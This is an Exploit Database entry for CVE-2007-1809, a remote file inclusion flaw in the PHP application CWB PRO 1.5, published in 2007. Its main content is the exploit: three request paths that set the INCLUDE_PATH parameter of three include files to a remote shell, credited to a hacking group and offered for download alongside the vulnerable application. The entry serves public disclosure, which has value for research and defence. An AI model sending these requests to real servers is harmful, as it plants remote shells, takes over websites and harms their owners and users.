Exploit Database - Logo

CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion

EDB-ID: 3628 Author: GoLd_M Published: 2007-04-01
CVE: CVE-2007-1809 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
# CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites
# D.Script: http://codewalkers.com/codefiles/373_cwbs1.5_demo.zip 
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/include/cls_headline_prod.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_listorders.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-01]

Related Exploits

Trying to match CVEs (1): CVE-2007-1809
Trying to match OSVDBs (3): 35226, 35227, 35228
Trying to match setup file: 6cca42dcf701501a151fb887c1dd74f4
Other Possible E-DB Search Terms: CWB PRO 1.5,  CWB PRO
Date D V Title Author
No matches
Menu